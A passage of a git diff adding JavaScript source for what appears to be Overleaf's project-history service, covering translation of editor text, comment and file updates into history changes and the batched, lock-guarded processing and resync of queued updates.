firstUpdate.meta.doc_length + for (const update of diffUpdates) { + update.meta.doc_length = docLength + docLength = adjustLengthByOp(docLength, update.op, { + tracked: update.meta.tc != null, + }) + delete update.meta.history_doc_length + } + + return diffUpdates + } + + return [firstUpdate, secondUpdate] +} + +/** + * Return the diff between two strings + * + * @param {string} before + * @param {string} after + * @returns {(InsertOp | DeleteOp)[]} the ops that generate that diff + */ +export function diffAsShareJsOps(before, after) { + const diffs = dmp.diff_main(before, after) + dmp.diff_cleanupSemantic(diffs) + + const ops = [] + let position = 0 + for (const diff of diffs) { + const type = diff[0] + const content = diff[1] + if (type === ADDED) { + ops.push({ + i: content, + p: position, + }) + position += content.length + } else if (type === REMOVED) { + ops.push({ + d: content, + p: position, + }) + } else if (type === UNCHANGED) { + position += content.length + } else { + throw new Error('Unknown type') + } + } + return ops +} + +/** + * Checks if two insert ops are inside the same comments + * + * @param {InsertOp} op1 + * @param {InsertOp} op2 + * @returns {boolean} + */ +function insertOpsInsideSameComments(op1, op2) { + const commentIds1 = op1.commentIds + const commentIds2 = op2.commentIds + if (commentIds1 == null && commentIds2 == null) { + // None are inside comments + return true + } + + if ( + commentIds1 != null && + commentIds2 != null && + commentIds1.every(id => commentIds2.includes(id)) && + commentIds2.every(id => commentIds1.includes(id)) + ) { + // Both are inside the same comments + return true + } + + return false +} diff --git a/services/project-history/app/js/UpdateTranslator.js b/services/project-history/app/js/UpdateTranslator.js new file mode 100644 index 0000000..38e65f6 --- /dev/null +++ b/services/project-history/app/js/UpdateTranslator.js @@ -0,0 +1,487 @@ +// @ts-check + +import _ from 'lodash' +import Core from 'overleaf-editor-core' +import * as Errors from './Errors.js' +import * as OperationsCompressor from './OperationsCompressor.js' +import { isInsert, isRetain, isDelete, isComment } from './Utils.js' + +/** + * @import { AddDocUpdate, AddFileUpdate, DeleteCommentUpdate, Op, RawScanOp } from './types' + * @import { RenameUpdate, TextUpdate, TrackingDirective, TrackingProps } from './types' + * @import { SetCommentStateUpdate, SetFileMetadataOperation, Update, UpdateWithBlob } from './types' + */ + +/** + * Convert updates into history changes + * + * @param {string} projectId + * @param {UpdateWithBlob[]} updatesWithBlobs + * @returns {Array<Core.Change | null>} + */ +export function convertToChanges(projectId, updatesWithBlobs) { + return updatesWithBlobs.map(update => _convertToChange(projectId, update)) +} + +/** + * Convert an update into a history change + * + * @param {string} projectId + * @param {UpdateWithBlob} updateWithBlob + * @returns {Core.Change | null} + */ +function _convertToChange(projectId, updateWithBlob) { + let operations + const { update } = updateWithBlob + + let projectVersion = null + const v2DocVersions = {} + + if (_isRenameUpdate(update)) { + operations = [ + { + pathname: _convertPathname(update.pathname), + newPathname: _convertPathname(update.new_pathname), + }, + ] + projectVersion = update.version + } else if (isAddUpdate(update)) { + const op = { + pathname: _convertPathname(update.pathname), + file: { + hash: updateWithBlob.blobHashes.file, + }, + } + if (_isAddDocUpdate(update)) { + op.file.rangesHash = 
updateWithBlob.blobHashes.ranges + } + if (_isAddFileUpdate(update)) { + op.file.metadata = update.metadata + } + operations = [op] + projectVersion = update.version + } else if (isTextUpdate(update)) { + const docLength = update.meta.history_doc_length ?? update.meta.doc_length + let pathname = update.meta.pathname + + pathname = _convertPathname(pathname) + const builder = new OperationsBuilder(docLength, pathname) + // convert ops + for (const op of update.op) { + builder.addOp(op, update) + } + // add doc hash if present + if (update.meta.doc_hash != null) { + // This will commit the text operation that the builder is currently + // building and set the contentHash property. + builder.commitTextOperation({ contentHash: update.meta.doc_hash }) + } + operations = builder.finish() + // add doc version information if present + if (update.v != null) { + v2DocVersions[update.doc] = { pathname, v: update.v } + } + } else if (isSetCommentStateUpdate(update)) { + operations = [ + { + pathname: _convertPathname(update.pathname), + commentId: update.commentId, + resolved: update.resolved, + }, + ] + } else if (isSetFileMetadataOperation(update)) { + operations = [ + { + pathname: _convertPathname(update.pathname), + metadata: update.metadata, + }, + ] + } else if (isDeleteCommentUpdate(update)) { + operations = [ + { + pathname: _convertPathname(update.pathname), + deleteComment: update.deleteComment, + }, + ] + } else { + const error = new Errors.UpdateWithUnknownFormatError( + 'update with unknown format', + { projectId, update } + ) + throw error + } + + let v2Authors + if (update.meta.user_id === 'anonymous-user') { + // history-v1 uses null to represent an anonymous author + v2Authors = [null] + } else { + // user_id is missing on resync operations that update the contents of a doc + v2Authors = _.compact([update.meta.user_id]) + } + + const rawChange = { + operations, + v2Authors, + timestamp: new Date(update.meta.ts).toISOString(), + projectVersion, + v2DocVersions: Object.keys(v2DocVersions).length ? 
v2DocVersions : null, + } + if (update.meta.origin) { + rawChange.origin = update.meta.origin + } else if (update.meta.type === 'external' && update.meta.source) { + rawChange.origin = { kind: update.meta.source } + } + const change = Core.Change.fromRaw(rawChange) + + if (change != null) { + change.operations = OperationsCompressor.compressOperations( + change.operations + ) + } + + return change +} + +/** + * @param {Update} update + * @returns {update is RenameUpdate} + */ +function _isRenameUpdate(update) { + return 'new_pathname' in update && update.new_pathname != null +} + +/** + * @param {Update} update + * @returns {update is AddDocUpdate} + */ +function _isAddDocUpdate(update) { + return ( + 'doc' in update && + update.doc != null && + 'docLines' in update && + update.docLines != null + ) +} + +/** + * @param {Update} update + * @returns {update is AddFileUpdate} + */ +function _isAddFileUpdate(update) { + return ( + 'file' in update && + update.file != null && + (('createdBlob' in update && update.createdBlob) || + ('url' in update && update.url != null)) + ) +} + +/** + * @param {Update} update + * @returns {update is TextUpdate} + */ +export function isTextUpdate(update) { + return ( + 'doc' in update && + update.doc != null && + 'op' in update && + update.op != null && + 'pathname' in update.meta && + update.meta.pathname != null && + 'doc_length' in update.meta && + update.meta.doc_length != null + ) +} + +export function isProjectStructureUpdate(update) { + return isAddUpdate(update) || _isRenameUpdate(update) +} + +/** + * @param {Update} update + * @returns {update is AddDocUpdate | AddFileUpdate} + */ +export function isAddUpdate(update) { + return _isAddDocUpdate(update) || _isAddFileUpdate(update) +} + +/** + * @param {Update} update + * @returns {update is SetCommentStateUpdate} + */ +export function isSetCommentStateUpdate(update) { + return 'commentId' in update && 'resolved' in update +} + +/** + * @param {Update} update + * @returns {update is DeleteCommentUpdate} + */ +export function isDeleteCommentUpdate(update) { + return 'deleteComment' in update +} + +/** + * @param {Update} update + * @returns {update is SetFileMetadataOperation} + */ +export function isSetFileMetadataOperation(update) { + return 'metadata' in update +} + +export function _convertPathname(pathname) { + // Strip leading / + pathname = pathname.replace(/^\//, '') + // Replace \\ with _. Backslashes are no longer allowed + // in projects in web, but we have some which have gone through + // into history before this restriction was added. This makes + // them valid for the history store. + // See https://github.com/overleaf/write_latex/issues/4471 + pathname = pathname.replace(/\\/g, '_') + // workaround for filenames containing asterisks, this will + // fail if a corresponding replacement file already exists but it + // would fail anyway without this attempt to fix the pathname. 
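+  // (e.g. 'figure*.png' becomes 'figure__ASTERISK__.png')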
+ // See https://github.com/overleaf/internal/issues/900 + pathname = pathname.replace(/\*/g, '__ASTERISK__') + // workaround for filenames beginning with spaces + // See https://github.com/overleaf/internal/issues/1404 + // note: we have already stripped any leading slash above + pathname = pathname.replace(/^ /, '__SPACE__') // handle top-level + pathname = pathname.replace(/\/ /g, '/__SPACE__') // handle folders + return pathname +} + +class OperationsBuilder { + /** + * @param {number} docLength + * @param {string} pathname + */ + constructor(docLength, pathname) { + /** + * List of operations being built + */ + this.operations = [] + + /** + * Currently built text operation + * + * @type {RawScanOp[]} + */ + this.textOperation = [] + + /** + * Cursor inside the current text operation + */ + this.cursor = 0 + + this.docLength = docLength + this.pathname = pathname + } + + /** + * @param {Op} op + * @param {TextUpdate} update + * @returns {void} + */ + addOp(op, update) { + // We sometimes receive operations that operate at positions outside the + // docLength. Document updater coerces the position to the end of the + // document. We do the same here. + const pos = Math.min(op.hpos ?? op.p, this.docLength) + + if (isComment(op)) { + // Commit the current text operation + this.commitTextOperation() + + // Add a comment operation + const commentLength = op.hlen ?? op.c.length + const commentOp = { + pathname: this.pathname, + commentId: op.t, + ranges: commentLength > 0 ? [{ pos, length: commentLength }] : [], + } + if ('resolved' in op) { + commentOp.resolved = op.resolved + } + this.operations.push(commentOp) + return + } + + if (!isInsert(op) && !isDelete(op) && !isRetain(op)) { + throw new Errors.UnexpectedOpTypeError('unexpected op type', { op }) + } + + if (pos < this.cursor) { + this.commitTextOperation() + // At this point, this.cursor === 0 and we can continue + } + + if (pos > this.cursor) { + this.retain(pos - this.cursor) + } + + if (isInsert(op)) { + if (op.trackedDeleteRejection) { + this.retain(op.i.length, { + tracking: { type: 'none' }, + }) + } else { + const opts = {} + if (update.meta.tc != null) { + opts.tracking = { + type: 'insert', + userId: update.meta.user_id, + ts: new Date(update.meta.ts).toISOString(), + } + } + if (op.commentIds != null) { + opts.commentIds = op.commentIds + } + this.insert(op.i, opts) + } + } + + if (isRetain(op)) { + if (op.tracking) { + this.retain(op.r.length, { tracking: op.tracking }) + } else { + this.retain(op.r.length) + } + } + + if (isDelete(op)) { + const changes = op.trackedChanges ?? [] + + // Tracked changes should already be ordered by offset, but let's make + // sure they are. 
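+      // Illustrative (not from the source): for equal offsets the comparator
+      // below orders deletes before inserts, e.g.
+      //   [{ type: 'insert', offset: 2, length: 1 }, { type: 'delete', offset: 2, length: 3 }]
+      // sorts to
+      //   [{ type: 'delete', offset: 2, length: 3 }, { type: 'insert', offset: 2, length: 1 }]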
+ changes.sort((a, b) => { + const posOrder = a.offset - b.offset + if (posOrder !== 0) { + return posOrder + } else if (a.type === 'insert' && b.type === 'delete') { + return 1 + } else if (a.type === 'delete' && b.type === 'insert') { + return -1 + } else { + return 0 + } + }) + + let offset = 0 + for (const change of changes) { + if (change.offset > offset) { + // Handle the portion before the tracked change + if (update.meta.tc != null) { + // This is a tracked delete + this.retain(change.offset - offset, { + tracking: { + type: 'delete', + userId: update.meta.user_id, + ts: new Date(update.meta.ts).toISOString(), + }, + }) + } else { + // This is a regular delete + this.delete(change.offset - offset) + } + offset = change.offset + } + + // Now, handle the portion inside the tracked change + if (change.type === 'delete') { + // Tracked deletes are skipped over when deleting + this.retain(change.length) + } else if (change.type === 'insert') { + // Deletes inside tracked inserts are always regular deletes + this.delete(change.length) + offset += change.length + } + } + if (offset < op.d.length) { + // Handle the portion after the last tracked change + if (update.meta.tc != null) { + // This is a tracked delete + this.retain(op.d.length - offset, { + tracking: { + type: 'delete', + userId: update.meta.user_id, + ts: new Date(update.meta.ts).toISOString(), + }, + }) + } else { + // This is a regular delete + this.delete(op.d.length - offset) + } + } + } + } + + /** + * @param {number} length + * @param {object} opts + * @param {TrackingDirective} [opts.tracking] + */ + retain(length, opts = {}) { + if (opts.tracking) { + this.textOperation.push({ r: length, ...opts }) + } else { + this.textOperation.push(length) + } + this.cursor += length + } + + /** + * @param {string} str + * @param {object} opts + * @param {TrackingProps} [opts.tracking] + * @param {string[]} [opts.commentIds] + */ + insert(str, opts = {}) { + if (opts.tracking || opts.commentIds) { + this.textOperation.push({ i: str, ...opts }) + } else { + this.textOperation.push(str) + } + this.cursor += str.length + this.docLength += str.length + } + + /** + * @param {number} length + * @param {object} opts + */ + delete(length, opts = {}) { + this.textOperation.push(-length) + this.docLength -= length + } + + /** + * Finalize the current text operation and push it to the queue + * + * @param {object} [opts] + * @param {string} [opts.contentHash] + */ + commitTextOperation(opts = {}) { + if (this.textOperation.length > 0 && this.cursor < this.docLength) { + this.retain(this.docLength - this.cursor) + } + if (this.textOperation.length > 0) { + const operation = { + pathname: this.pathname, + textOperation: this.textOperation, + } + if (opts.contentHash != null) { + operation.contentHash = opts.contentHash + } + this.operations.push(operation) + this.textOperation = [] + } + this.cursor = 0 + } + + finish() { + this.commitTextOperation() + return this.operations + } +} diff --git a/services/project-history/app/js/UpdatesProcessor.js b/services/project-history/app/js/UpdatesProcessor.js new file mode 100644 index 0000000..b52fac7 --- /dev/null +++ b/services/project-history/app/js/UpdatesProcessor.js @@ -0,0 +1,800 @@ +import { promisify } from 'node:util' +import logger from '@overleaf/logger' +import async from 'async' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as 
UpdateTranslator from './UpdateTranslator.js'
+import * as BlobManager from './BlobManager.js'
+import * as RedisManager from './RedisManager.js'
+import * as ErrorRecorder from './ErrorRecorder.js'
+import * as LockManager from './LockManager.js'
+import * as UpdateCompressor from './UpdateCompressor.js'
+import * as WebApiManager from './WebApiManager.js'
+import * as SyncManager from './SyncManager.js'
+import * as Versions from './Versions.js'
+import * as Errors from './Errors.js'
+import * as Metrics from './Metrics.js'
+import * as RetryManager from './RetryManager.js'
+import { Profiler } from './Profiler.js'
+
+const keys = Settings.redis.lock.key_schema
+
+export const REDIS_READ_BATCH_SIZE = 500
+
+/**
+ * Container for functions that need to be mocked in tests
+ *
+ * TODO: Rewrite tests in terms of exported functions only
+ */
+export const _mocks = {}
+
+export function getRawUpdates(projectId, batchSize, callback) {
+  RedisManager.getRawUpdatesBatch(projectId, batchSize, (error, batch) => {
+    if (error != null) {
+      return callback(OError.tag(error))
+    }
+
+    let updates
+    try {
+      updates = RedisManager.parseDocUpdates(batch.rawUpdates)
+    } catch (error) {
+      return callback(OError.tag(error))
+    }
+
+    _getHistoryId(projectId, updates, (error, historyId) => {
+      if (error != null) {
+        return callback(OError.tag(error))
+      }
+      HistoryStoreManager.getMostRecentChunk(
+        projectId,
+        historyId,
+        (error, chunk) => {
+          if (error != null) {
+            return callback(OError.tag(error))
+          }
+          callback(null, { project_id: projectId, chunk, updates })
+        }
+      )
+    })
+  })
+}
+
+// Trigger a resync and start processing under lock, so that other operations
+// cannot flush the resync updates in the meantime.
+export function startResyncAndProcessUpdatesUnderLock(
+  projectId,
+  opts,
+  callback
+) {
+  const startTimeMs = Date.now()
+  LockManager.runWithLock(
+    keys.projectHistoryLock({ project_id: projectId }),
+    (extendLock, releaseLock) => {
+      SyncManager.startResyncWithoutLock(projectId, opts, err => {
+        if (err) return callback(OError.tag(err))
+        extendLock(err => {
+          if (err) return callback(OError.tag(err))
+          _countAndProcessUpdates(
+            projectId,
+            extendLock,
+            REDIS_READ_BATCH_SIZE,
+            releaseLock
+          )
+        })
+      })
+    },
+    (flushError, queueSize) => {
+      if (flushError) {
+        OError.tag(flushError)
+        ErrorRecorder.record(projectId, queueSize, flushError, recordError => {
+          if (recordError) {
+            logger.error(
+              { err: recordError, projectId },
+              'failed to record error'
+            )
+          }
+          callback(flushError)
+        })
+      } else {
+        ErrorRecorder.clearError(projectId, clearError => {
+          if (clearError) {
+            logger.error(
+              { err: clearError, projectId },
+              'failed to clear error'
+            )
+          }
+          callback()
+        })
+      }
+      if (queueSize > 0) {
+        const duration = (Date.now() - startTimeMs) / 1000
+        Metrics.historyFlushDurationSeconds.observe(duration)
+        Metrics.historyFlushQueueSize.observe(queueSize)
+      }
+      // clear the timestamp in the background if the queue is now empty
+      RedisManager.clearDanglingFirstOpTimestamp(projectId, () => {})
+    }
+  )
+}
+
+// Process all updates for a project, checking project-level information only once
+export function processUpdatesForProject(projectId, callback) {
+  const startTimeMs = Date.now()
+  LockManager.runWithLock(
+    keys.projectHistoryLock({ project_id: projectId }),
+    (extendLock, releaseLock) => {
+      _countAndProcessUpdates(
+        projectId,
+        extendLock,
+        REDIS_READ_BATCH_SIZE,
+        releaseLock
+      )
+    },
+    (flushError, queueSize) => {
+      if (flushError) {
+        OError.tag(flushError)
+        ErrorRecorder.record(
+          projectId,
queueSize, + flushError, + (recordError, failure) => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + callback(recordError) + } else if ( + RetryManager.isFirstFailure(failure) && + RetryManager.isHardFailure(failure) + ) { + // This is the first failed flush since the last successful flush. + // Immediately attempt a resync. + logger.warn({ projectId }, 'Flush failed, attempting resync') + resyncProject(projectId, callback) + } else { + callback(flushError) + } + } + ) + } else { + ErrorRecorder.clearError(projectId, clearError => { + if (clearError) { + logger.error( + { err: clearError, projectId }, + 'failed to clear error' + ) + } + callback() + }) + } + if (queueSize > 0) { + const duration = (Date.now() - startTimeMs) / 1000 + Metrics.historyFlushDurationSeconds.observe(duration) + Metrics.historyFlushQueueSize.observe(queueSize) + } + // clear the timestamp in the background if the queue is now empty + RedisManager.clearDanglingFirstOpTimestamp(projectId, () => {}) + } + ) +} + +export function resyncProject(projectId, callback) { + SyncManager.startHardResync(projectId, {}, error => { + if (error != null) { + return callback(OError.tag(error)) + } + // Flush the sync operations; this will not loop indefinitely + // because any failure won't be the first failure anymore. + LockManager.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + (extendLock, releaseLock) => { + _countAndProcessUpdates( + projectId, + extendLock, + REDIS_READ_BATCH_SIZE, + releaseLock + ) + }, + (flushError, queueSize) => { + if (flushError) { + ErrorRecorder.record( + projectId, + queueSize, + flushError, + (recordError, failure) => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + callback(OError.tag(recordError)) + } else { + callback(OError.tag(flushError)) + } + } + ) + } else { + ErrorRecorder.clearError(projectId, clearError => { + if (clearError) { + logger.error( + { err: clearError, projectId }, + 'failed to clear error' + ) + } + callback() + }) + } + } + ) + }) +} + +export function processUpdatesForProjectUsingBisect( + projectId, + amountToProcess, + callback +) { + LockManager.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + (extendLock, releaseLock) => { + _countAndProcessUpdates( + projectId, + extendLock, + amountToProcess, + releaseLock + ) + }, + (flushError, queueSize) => { + if (amountToProcess === 0 || queueSize === 0) { + // no further processing possible + if (flushError != null) { + ErrorRecorder.record( + projectId, + queueSize, + OError.tag(flushError), + recordError => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + } + callback(flushError) + } + ) + } else { + callback() + } + } else { + if (flushError != null) { + // decrease the batch size when we hit an error + processUpdatesForProjectUsingBisect( + projectId, + Math.floor(amountToProcess / 2), + callback + ) + } else { + // otherwise continue processing with the same batch size + processUpdatesForProjectUsingBisect( + projectId, + amountToProcess, + callback + ) + } + } + } + ) +} + +export function processSingleUpdateForProject(projectId, callback) { + LockManager.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + ( + extendLock, + releaseLock // set the batch size to 1 for single-stepping + ) => { + _countAndProcessUpdates(projectId, extendLock, 1, releaseLock) + }, + (flushError, queueSize) => { + 
// no need to clear the flush marker when single stepping + // it will be cleared up on the next background flush if + // the queue is empty + if (flushError) { + ErrorRecorder.record(projectId, queueSize, flushError, recordError => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + } + callback(flushError) + }) + } else { + ErrorRecorder.clearError(projectId, clearError => { + if (clearError) { + logger.error( + { err: clearError, projectId }, + 'failed to clear error' + ) + } + callback() + }) + } + } + ) +} + +_mocks._countAndProcessUpdates = ( + projectId, + extendLock, + batchSize, + callback +) => { + RedisManager.countUnprocessedUpdates(projectId, (error, queueSize) => { + if (error != null) { + return callback(OError.tag(error)) + } + if (queueSize > 0) { + logger.debug({ projectId, queueSize }, 'processing uncompressed updates') + RedisManager.getUpdatesInBatches( + projectId, + batchSize, + (updates, cb) => { + _processUpdatesBatch(projectId, updates, extendLock, cb) + }, + error => { + // Unconventional callback signature. The caller needs the queue size + // even when an error is thrown in order to record the queue size in + // the projectHistoryFailures collection. We'll have to find another + // way to achieve this when we promisify. + callback(error, queueSize) + } + ) + } else { + logger.debug({ projectId }, 'no updates to process') + callback(null, queueSize) + } + }) +} + +function _countAndProcessUpdates(...args) { + _mocks._countAndProcessUpdates(...args) +} + +function _processUpdatesBatch(projectId, updates, extendLock, callback) { + // If the project doesn't have a history then we can bail out here + _getHistoryId(projectId, updates, (error, historyId) => { + if (error != null) { + return callback(OError.tag(error)) + } + + if (historyId == null) { + logger.debug( + { projectId }, + 'discarding updates as project does not use history' + ) + return callback() + } + + _processUpdates(projectId, historyId, updates, extendLock, error => { + if (error != null) { + return callback(OError.tag(error)) + } + callback() + }) + }) +} + +export function _getHistoryId(projectId, updates, callback) { + let idFromUpdates = null + + // check that all updates have the same history id + for (const update of updates) { + if (update.projectHistoryId != null) { + if (idFromUpdates == null) { + idFromUpdates = update.projectHistoryId.toString() + } else if (idFromUpdates !== update.projectHistoryId.toString()) { + metrics.inc('updates.batches.project-history-id.inconsistent-update') + return callback( + new OError('inconsistent project history id between updates', { + projectId, + idFromUpdates, + currentId: update.projectHistoryId, + }) + ) + } + } + } + + WebApiManager.getHistoryId(projectId, (error, idFromWeb) => { + if (error != null && idFromUpdates != null) { + // present only on updates + // 404s from web are an error + metrics.inc('updates.batches.project-history-id.from-updates') + return callback(null, idFromUpdates) + } else if (error != null) { + return callback(OError.tag(error)) + } + + if (idFromWeb == null && idFromUpdates == null) { + // present on neither web nor updates + callback(null, null) + } else if (idFromWeb != null && idFromUpdates == null) { + // present only on web + metrics.inc('updates.batches.project-history-id.from-web') + callback(null, idFromWeb) + } else if (idFromWeb == null && idFromUpdates != null) { + // present only on updates + metrics.inc('updates.batches.project-history-id.from-updates') + 
callback(null, idFromUpdates) + } else if (idFromWeb.toString() !== idFromUpdates.toString()) { + // inconsistent between web and updates + metrics.inc('updates.batches.project-history-id.inconsistent-with-web') + logger.warn( + { + projectId, + idFromWeb, + idFromUpdates, + updates, + }, + 'inconsistent project history id between updates and web' + ) + callback( + new OError('inconsistent project history id between updates and web') + ) + } else { + // the same on web and updates + metrics.inc('updates.batches.project-history-id.from-updates') + callback(null, idFromWeb) + } + }) +} + +function _handleOpsOutOfOrderError(projectId, projectHistoryId, err, ...rest) { + const adjustedLength = Math.max(rest.length, 1) + const results = rest.slice(0, adjustedLength - 1) + const callback = rest[adjustedLength - 1] + ErrorRecorder.getFailureRecord(projectId, (error, failureRecord) => { + if (error != null) { + return callback(error) + } + // Bypass ops-out-of-order errors in the stored chunk when in forceDebug mode + if (failureRecord != null && failureRecord.forceDebug === true) { + logger.warn( + { err, projectId, projectHistoryId }, + 'ops out of order in chunk, forced continue' + ) + callback(null, ...results) // return results without error + } else { + callback(err, ...results) + } + }) +} + +function _getMostRecentVersionWithDebug(projectId, projectHistoryId, callback) { + HistoryStoreManager.getMostRecentVersion( + projectId, + projectHistoryId, + (err, ...results) => { + if (err instanceof Errors.OpsOutOfOrderError) { + _handleOpsOutOfOrderError( + projectId, + projectHistoryId, + err, + ...results, + callback + ) + } else { + callback(err, ...results) + } + } + ) +} + +export function _processUpdates( + projectId, + projectHistoryId, + updates, + extendLock, + callback +) { + const profile = new Profiler('_processUpdates', { + project_id: projectId, + projectHistoryId, + }) + // skip updates first if we're in a sync, we might not need to do anything else + SyncManager.skipUpdatesDuringSync( + projectId, + updates, + (error, filteredUpdates, newSyncState) => { + profile.log('skipUpdatesDuringSync') + if (error != null) { + return callback(error) + } + if (filteredUpdates.length === 0) { + // return early if there are no updates to apply + return SyncManager.setResyncState(projectId, newSyncState, callback) + } + // only make request to history service if we have actual updates to process + _getMostRecentVersionWithDebug( + projectId, + projectHistoryId, + ( + error, + baseVersion, + projectStructureAndDocVersions, + _lastChange, + mostRecentChunk + ) => { + if (projectStructureAndDocVersions == null) { + projectStructureAndDocVersions = { project: null, docs: {} } + } + profile.log('getMostRecentVersion') + if (error != null) { + return callback(error) + } + async.waterfall( + [ + cb => { + cb = profile.wrap('expandSyncUpdates', cb) + SyncManager.expandSyncUpdates( + projectId, + projectHistoryId, + mostRecentChunk, + filteredUpdates, + extendLock, + cb + ) + }, + (expandedUpdates, cb) => { + let unappliedUpdates + try { + unappliedUpdates = _skipAlreadyAppliedUpdates( + projectId, + expandedUpdates, + projectStructureAndDocVersions + ) + } catch (err) { + return cb(err) + } + profile.log('skipAlreadyAppliedUpdates') + const compressedUpdates = + UpdateCompressor.compressRawUpdates(unappliedUpdates) + const timeTaken = profile + .log('compressRawUpdates') + .getTimeDelta() + if (timeTaken >= 1000) { + logger.debug( + { projectId, updates: unappliedUpdates, timeTaken }, + 'slow 
compression of raw updates' + ) + } + cb = profile.wrap('createBlobs', cb) + BlobManager.createBlobsForUpdates( + projectId, + projectHistoryId, + compressedUpdates, + extendLock, + cb + ) + }, + (updatesWithBlobs, cb) => { + let changes + try { + changes = UpdateTranslator.convertToChanges( + projectId, + updatesWithBlobs + ).map(change => change.toRaw()) + } catch (err) { + return cb(err) + } finally { + profile.log('convertToChanges') + } + cb(null, changes) + }, + (changes, cb) => { + let change + const numChanges = changes.length + const byteLength = Buffer.byteLength( + JSON.stringify(changes), + 'utf8' + ) + let numOperations = 0 + for (change of changes) { + if (change.operations != null) { + numOperations += change.operations.length + } + } + + metrics.timing('history-store.request.changes', numChanges, 1) + metrics.timing('history-store.request.bytes', byteLength, 1) + metrics.timing( + 'history-store.request.operations', + numOperations, + 1 + ) + + // thresholds taken from write_latex/main/lib/history_exporter.rb + if (numChanges > 1000) { + metrics.inc('history-store.request.exceeds-threshold.changes') + } + if (byteLength > Math.pow(1024, 2)) { + metrics.inc('history-store.request.exceeds-threshold.bytes') + const changeLengths = changes.map(change => + Buffer.byteLength(JSON.stringify(change), 'utf8') + ) + logger.warn( + { projectId, byteLength, changeLengths }, + 'change size exceeds limit' + ) + } + + cb = profile.wrap('sendChanges', cb) + // this is usually the longest request, so extend the lock before starting it + extendLock(error => { + if (error != null) { + return cb(error) + } + if (changes.length === 0) { + return cb() + } // avoid unnecessary requests to history service + HistoryStoreManager.sendChanges( + projectId, + projectHistoryId, + changes, + baseVersion, + cb + ) + }) + }, + cb => { + cb = profile.wrap('setResyncState', cb) + SyncManager.setResyncState(projectId, newSyncState, cb) + }, + ], + error => { + profile.end() + callback(error) + } + ) + } + ) + } + ) +} + +_mocks._skipAlreadyAppliedUpdates = ( + projectId, + updates, + projectStructureAndDocVersions +) => { + function alreadySeenProjectVersion(previousProjectStructureVersion, update) { + return ( + UpdateTranslator.isProjectStructureUpdate(update) && + previousProjectStructureVersion != null && + update.version != null && + Versions.gte(previousProjectStructureVersion, update.version) + ) + } + + function alreadySeenDocVersion(previousDocVersions, update) { + if (UpdateTranslator.isTextUpdate(update) && update.v != null) { + const docId = update.doc + return ( + previousDocVersions[docId] != null && + previousDocVersions[docId].v != null && + Versions.gte(previousDocVersions[docId].v, update.v) + ) + } else { + return false + } + } + + // check that the incoming updates are in the correct order (we do not + // want to send out of order updates to the history service) + let incomingProjectStructureVersion = null + const incomingDocVersions = {} + for (const update of updates) { + if (alreadySeenProjectVersion(incomingProjectStructureVersion, update)) { + logger.warn( + { projectId, update, incomingProjectStructureVersion }, + 'incoming project structure updates are out of order' + ) + throw new Errors.OpsOutOfOrderError( + 'project structure version out of order on incoming updates' + ) + } else if (alreadySeenDocVersion(incomingDocVersions, update)) { + logger.warn( + { projectId, update, incomingDocVersions }, + 'incoming doc updates are out of order' + ) + throw new Errors.OpsOutOfOrderError( 
+          'doc version out of order on incoming updates'
+        )
+      }
+    }
+    // update the current project structure and doc versions
+    if (UpdateTranslator.isProjectStructureUpdate(update)) {
+      incomingProjectStructureVersion = update.version
+    } else if (UpdateTranslator.isTextUpdate(update)) {
+      incomingDocVersions[update.doc] = { v: update.v }
+    }
+  }
+
+  // discard updates already applied
+  const updatesToApply = []
+  if (projectStructureAndDocVersions == null) {
+    // defensive default; _processUpdates normally supplies this before calling
+    projectStructureAndDocVersions = { project: null, docs: {} }
+  }
+  const previousProjectStructureVersion = projectStructureAndDocVersions.project
+  const previousDocVersions = projectStructureAndDocVersions.docs
+  const updateProjectVersions = []
+  for (const update of updates) {
+    if (update != null && update.version != null) {
+      updateProjectVersions.push(update.version)
+    }
+  }
+  logger.debug(
+    { projectId, projectStructureAndDocVersions, updateProjectVersions },
+    'comparing updates with existing project versions'
+  )
+  for (const update of updates) {
+    if (alreadySeenProjectVersion(previousProjectStructureVersion, update)) {
+      metrics.inc('updates.discarded_project_structure_version')
+      logger.debug(
+        { projectId, update, previousProjectStructureVersion },
+        'discarding previously applied project structure update'
+      )
+      continue
+    }
+    if (alreadySeenDocVersion(previousDocVersions, update)) {
+      metrics.inc('updates.discarded_doc_version')
+      logger.debug(
+        { projectId, update, previousDocVersions },
+        'discarding previously applied doc update'
+      )
+      continue
+    }
+    // remove non-BMP characters from resync updates that have bypassed the
+    // normal docupdater flow
+    _sanitizeUpdate(update)
+    // if all checks above are ok then accept the update
+    updatesToApply.push(update)
+  }
+
+  return updatesToApply
+}
+
+export function _skipAlreadyAppliedUpdates(...args) {
+  return _mocks._skipAlreadyAppliedUpdates(...args)
+}
+
+function _sanitizeUpdate(update) {
+  // Adapted from docupdater's UpdateManager. Ideally these characters would be
+  // cleaned in docupdater as well, but existing queues already contain
+  // affected updates, so we also handle them here for robustness.
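+  // Illustrative sketch (not from the source) of the cleanup below: every code
+  // unit in the surrogate range is replaced, so an unpaired '\uD800' becomes
+  // '\uFFFD' and a full pair such as '\uD83D\uDE00' becomes '\uFFFD\uFFFD'.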
